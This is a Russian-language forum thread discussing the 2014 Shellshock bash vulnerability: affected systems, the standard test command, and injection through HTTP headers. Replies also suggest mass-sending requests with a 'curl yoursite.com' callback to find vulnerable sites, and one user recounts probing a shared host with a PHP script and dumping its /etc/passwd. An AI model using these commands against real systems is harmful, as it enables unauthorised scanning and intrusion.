Recommended Posts

Гудит интернет. Обнаружена новая уязвимость:

Знатокам

 

Кто подвержен уязвимости?

Все линукс системы с командной оболочкой GNU bash от cpe:/a:gnu:bash:1.14.0 до cpe:/a:gnu:bash:4.3

Вас это касается если у вас MAC или Linux/Unix/BSD.

Вас это касается если у вас есть модем роутер на встроенном Linux.

 

Чем опасно?

Утечкой персональных данных, перехватом трафика с банками и почтовыми системами.

 

Что делать?

Если есть возможность обновиться. Если нет — закрыть нафиг любые возможности снаружи получить доступ к любым интерфейсам в том числе к WEB интерфейсам.

 

Как провериться?

Дырявая система

[root@test ~]# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

 

Пропатченная система:

[root@test ~]# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
this is a test

 

В интересные времена живём.

 

 

UPD:

Виндоузятники могут откинуться на спинку и смотреть как вскрывают их почту.

bash Shellshock through MAIL .forward / qmail-alias piping (ML program etc.) CVE-2014-6271

 

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky

Прям представил себе, как умучанные виндузятники, веками попираемые за вирусоносительство и убогость Виндов, вдруг откинулись в креслах, отёрли со лбов пот, выступивший в борьбе с вирусами и троянами, улыбнулись и подумали: "а бог-то есть"...

:trava:

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky
Гудит интернет.

А как планируется к этому bash'у получить доступ? :)

 

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky
А как планируется к этому bash'у получить доступ? :)

 

можно через User-Agent или HTTP Referer подсунуть магический код для баша. Ну, и если вдруг, скажем, PHP скрипт запускает какой-нибудь bash-скрипт, то код из соответствующей переменной окружения исполнится.

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky
Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells.

А как планируется к этому PHP скриптy получить доступ? :)

 

IMHO много теоретического шума, практического вреда пока не наблюдается.

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky
А как планируется к этому PHP скриптy получить доступ? :)

 

Доступ на что? Исполнение - через заход на сайт, передав нужный UA или HTTP Referer. Другой вопрос, как найти такие сайты, которые внутри себя еще и bash запускают.

 

Как вариант, массово отправлять HTTP запросы вместе с командой "curl yoursite.com/hello-i-am-vulnerable" по разным ресурсам и смотреть в логи yoursite.com, кто отстучался в ответ.

 

IMHO много теоретического шума, практического вреда пока не наблюдается.

 

Так и от heartbleed вроде только теоретический шум был, а практически - никто шуметь не будет :)

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky
Ну, и если вдруг, скажем, PHP скрипт запускает какой-нибудь bash-скрипт, то код из соответствующей переменной окружения исполнится.
Вот здесь облом, которому стоит порадоваться.

PHP scripts executed with mod_php are not affected even if they spawn subshells.

 

IMHO много теоретического шума, практического вреда пока не наблюдается.
Jin, меня удивляет твой скепсис. Помнишь утечку почтовых адресов? Одна из версий кража из-за оплошности пользователей: трояны, фишинг. Но что-то все уже забыли про уязвимость ssl обнаруженную в начале года. Она вполне может являться причиной такой массовой утечки. У нас всё больше и больше важной информации управляется через онлайт инструменты, поэтому подстерегающие опасности всё выше и выше. Поэтому я бы не стал недооценивать вред от этой уязвимости. Особенно учитывая её почтенный возраст.

 

На счёт как эксплуатировать я уже привёл в обновлении первого поста.

через 25 порт и pipe получают доступ к /etc/shadow

Помнишь вирус Морриса? Похоже здесь применимы те же методы.

 

Но сейчас всё происходит очень быстро и теория этой утечки давно уже на практике. Уже есть perl скрипт эксплуатирующий эту уязвимость. Ждём трафик.

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky
PHP scripts executed with mod_php are not affected even if they spawn subshells.

 

PHP не всегда и не везде запускается через mod_php. У многих он, например, через FCGI работает, у кого nginx стоит без прослойки с Апачем. Ну и PHP тут просто для примера.

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky

Один крупный российский хостер... Не буду называть его имени...

Есть там сайт шаред хостинге. Есть доступ по FTP.

 

<?php
$cmd = "env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"";
passthru( $cmd );

exit(0);
?>

 

Заходим на сайт XXXX, и видим:

 

vulnerable this is a test

 

Продолжаем корректировать скрипт.

 

Что у нас там за операционка?

FreeBSD

 

А что в /etc/passwd ?

#

#

root:*:0:0:Charlie &:/root:/usr/local/bin/bash

mail:*:42:6:User &:/home/mail:/bin/sh

man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin

mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin

nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

system:*:106:106:User &:/nonexistent:/bin/sh

 

Хорошо... А дальше?

 

Дальше хуже...

 

Пора им письмо писать....

 

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky
Есть доступ по FTP.

при наличии ftp в исполняемые места можно горы воротить и без уязвимостей (в рамках привелегий web юзера) :)

маркет о том, что никаких точек доступа, кроме интерфейсов nginx/apache, быть не должно.

 

ПС: Базу с адресами я смотрел - какая-то она левая и ни одного пароля не подошло :)

Sdílet tento příspěvek


Odkaz na příspěvek
Sdílet na ostatní stránky

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Odpovědět na toto téma...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




  • Kdo si právě prohlíží tuto stránku

    Žádný registrovaný uživatel si neprohlíží tuto stránku